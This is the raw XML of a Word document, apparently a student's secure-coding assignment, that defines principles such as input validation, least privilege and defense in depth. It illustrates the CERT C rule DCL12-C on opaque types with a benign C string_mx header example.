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54C2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54C2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54C2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54C2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54C2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54C2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54C2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54C2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54C2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54C2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54C2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54C2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54C2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54C2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54C2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54C2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54C2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54C2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54C2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54C2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54C2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54C2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205F020" w:rsidR="00381847" w:rsidRDefault="00F30B1A">
            <w:pPr>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
            </w:pPr>
            <w:r>
              <w:t>Used to ensure data entering the workflow is correctly formed. This prevents malformed data from both entering the database. All potentially untrusted data should be processed by validating the input.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EA3C89F" w:rsidR="00381847" w:rsidRDefault="00F30B1A">
            <w:pPr>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
            </w:pPr>
            <w:r>
              <w:t>When writing code and programming, the compilers are designed to warn about errors. Heeding these is just actively fixing and acknowledging these warnings. These warning are not intended to be annoying, but to assist the programmer in identifying often hard to spot errors on runtime.</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054441D" w:rsidR="00381847" w:rsidRDefault="00F75717">
            <w:pPr>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Architect and design </w:t>
            </w:r>
            <w:r w:rsidR="00732A79">
              <w:t>refer</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> to designed artifacts which describe security countermeasures. </w:t>
            </w:r>
            <w:r w:rsidR="00F30B1A">
              <w:t xml:space="preserve">A security policy statement describes how entities access each other. </w:t>
            </w:r>
            <w:r w:rsidR="00732A79">
              <w:t>Also,</w:t>
            </w:r>
            <w:r w:rsidR="00F30B1A">
              <w:t xml:space="preserve"> the operations these entities can do is described. To add, </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">the level of </w:t>
            </w:r>
            <w:r w:rsidR="00732A79">
              <w:t>protection,</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> which is required, and the actions to be taken when there is a lack of requirements met, are outlined in the policy.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F95D4B" w:rsidR="00381847" w:rsidRDefault="00F75717">
            <w:pPr>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
            </w:pPr>
            <w:r>
              <w:t>Straightforward principle which says that systems or designs should be as simple as possible. Avoiding complexity is the ideal approach.</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4881C6F" w:rsidR="00381847" w:rsidRDefault="00F75717">
            <w:pPr>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
            </w:pPr>
            <w:r>
              <w:t>Deny by default. Unless an action or ability is specifically allowed, then it should be denied. This prevents unforeseen cases from potentially performing actions that are unintended and even malicious.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2AD6659" w:rsidR="00381847" w:rsidRDefault="00F75717">
            <w:pPr>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">The least privilege is giving the user or accessor the least number of permissions necessary. A user should not be given permissions that are not necessary for their intended purposes.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F8CA56F" w:rsidR="00381847" w:rsidRDefault="00F75717">
            <w:pPr>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve"> Sanitizing data is taking data and cleaning it. Data should have unwanted characters removed or escaped before data is processed. Whenever a trust boundary is crossed by data, it should receive this “sanitation” before crossing that boundary.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F6ABBB6" w:rsidR="00381847" w:rsidRDefault="00F75717">
            <w:pPr>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Defense in depth refers to having multiple unrelated layers of security for a single attack. The idea is that if one </w:t>
            </w:r>
            <w:r w:rsidR="00377AB5">
              <w:t xml:space="preserve">layer of security fails, the next layer will be there to defend.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628405F" w:rsidR="00381847" w:rsidRDefault="00377AB5">
            <w:pPr>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">There are many QA techniques, but some of the most effective ones are the following: Test early and test often, </w:t>
            </w:r>
            <w:r w:rsidR="00F63972">
              <w:t>define a process, and communicate rules and requirements.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513B0B2" w:rsidR="00381847" w:rsidRDefault="00F63972">
            <w:pPr>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
            </w:pPr>
            <w:r>
              <w:t>Secure coding standards are rules and guidelines used to prevent vulnerabilities. Some examples of secure coding standards are, CERT, CVE, NVD, OWASP, and DISA STIG.</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C1B0AEB" w:rsidR="00381847" w:rsidRDefault="00305753">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00305753">
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Implement abstract data types using opaque types</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636F218" w:rsidR="00381847" w:rsidRDefault="00E769D9">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>[</w:t>
            </w:r>
            <w:r w:rsidR="00305753">
              <w:t>DCL</w:t>
            </w:r>
            <w:r>
              <w:t>-</w:t>
            </w:r>
            <w:r w:rsidR="00F65974">
              <w:t>0</w:t>
            </w:r>
            <w:r w:rsidR="00305753">
              <w:t>12</w:t>
            </w:r>
            <w:r>
              <w:t>-</w:t>
            </w:r>
            <w:r w:rsidR="00305753">
              <w:t>C</w:t>
            </w:r>
            <w:r>
              <w:t>]</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7632" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="7140E542" w14:textId="0E0E3AE9" w:rsidR="00381847" w:rsidRDefault="00305753">
            <w:r>
              <w:t>Abstract data types are more effective when used with private data types and information hiding. This can lead to poor portability.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BBF9F37" w:rsidR="00F72634" w:rsidRDefault="00305753" w:rsidP="0015146B">
            <w:r>
              <w:t xml:space="preserve">The implementation of the </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>string_mx</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> type is fully visible to the user of the data type after including the </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>string_m.h</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> file. This violates the software engineering principle of information hiding and data encapsulation leading to less portable code.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F72634" w14:paraId="5B8614A1" w14:textId="77777777" w:rsidTr="0015146B">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10800" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="333AEB1B"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struct </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00305753">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>string_mx</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00305753">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="765A4877"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  </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00305753">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>size_t</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00305753">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00305753">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>size;</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="009AFF63"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  </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00305753">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>size_t</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00305753">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00305753">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>maxsize</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00305753">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>;</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="554419B5"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  unsigned char </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00305753">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>strtype</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00305753">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>;</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="309B1D0E"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  char *</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00305753">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>cstr</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00305753">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>;</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="49B68165"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w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="798EDB53"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 </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="788104F9"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typedef struct </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00305753">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>string_mx</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00305753">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00305753">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>string_</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00305753">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>mx</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00305753">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>;</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="08A8AE2F"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 </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4A2EFFF0"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Function declarations */</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="081D833E"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extern </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00305753">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>errno_t</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00305753">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00305753">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>strcpy_m</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00305753">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00305753">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>string_mx</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00305753">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> *s1, const </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00305753">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>string_mx</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00305753">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> *s2</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00305753">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>);</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="6F4087F6" w14:textId="77777777" w:rsidR="00305753" w:rsidRPr="00305753" w:rsidRDefault="00305753" w:rsidP="00305753">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00305753">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">extern </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00305753">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>errno_t</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00305753">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00305753">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>strcat_m</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00305753">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00305753">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>string_mx</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00305753">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> *s1, const </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00305753">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>string_mx</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00305753">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> *s2</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00305753">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>);</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="3ECD0D5A" w14:textId="19ACC92D" w:rsidR="00F72634" w:rsidRDefault="00305753" w:rsidP="00305753">
            <w:r w:rsidRPr="00305753">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>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3A6CE98" w:rsidR="00F72634" w:rsidRDefault="00BB58FE" w:rsidP="0015146B">
            <w:r>
              <w:t xml:space="preserve">In the external, header file, the </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>string_mx</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> type is defined to the instance of struct </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>string_mx</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">. However, in the internal header file, the struct </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>string_mx</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> is fully defined but not visible to a user of the data abstraction.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F72634" w14:paraId="4EAB134E" w14:textId="77777777" w:rsidTr="0015146B">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10800" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="26F4851C" w14:textId="0DC0BDEA" w:rsidR="0019484D" w:rsidRPr="0019484D" w:rsidRDefault="0019484D" w:rsidP="0019484D">
            <w:pPr>
              <w:spacing w:line="300" w:lineRule="atLeast"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0019484D">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>External-</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="798B6EBB" w14:textId="55833E29" w:rsidR="0019484D" w:rsidRPr="0019484D" w:rsidRDefault="0019484D" w:rsidP="0019484D">
            <w:pPr>
              <w:spacing w:line="300" w:lineRule="atLeast"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0019484D">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>struct</w:t>
            </w:r>
            <w:r w:rsidRPr="0019484D">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0019484D">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>string_</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="0019484D">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>mx</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0019484D">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>;</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="7523F205" w14:textId="77777777" w:rsidR="0019484D" w:rsidRPr="0019484D" w:rsidRDefault="0019484D" w:rsidP="0019484D">
            <w:pPr>
              <w:spacing w:line="300" w:lineRule="atLeast"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0019484D">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>typedef</w:t>
            </w:r>
            <w:r w:rsidRPr="0019484D">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="0019484D">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>struct</w:t>
            </w:r>
            <w:r w:rsidRPr="0019484D">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0019484D">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>string_mx</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0019484D">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0019484D">
